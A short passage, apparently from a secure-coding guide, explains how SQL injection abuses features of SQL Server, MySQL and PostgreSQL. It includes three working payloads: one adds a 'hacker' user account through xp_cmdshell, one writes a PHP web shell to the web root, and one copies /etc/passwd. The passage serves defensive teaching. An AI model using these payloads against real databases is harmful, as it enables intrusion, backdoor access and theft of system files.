Database-Specific Exploitation Methods

Different database systems offer unique features that attackers exploit. Microsoft SQL Server's xp_cmdshell allows command execution:

'; EXEC xp_cmdshell('net user hacker password123 /add')--

MySQL's INTO OUTFILE writes query results to files:

' UNION SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'--

PostgreSQL's COPY command can read server files:

'; COPY (SELECT '') TO PROGRAM 'cat /etc/passwd > /tmp/passwd.txt'--

Understanding these database-specific vectors helps developers recognize why generic security measures aren't sufficient—protection must account for the specific database system's capabilities.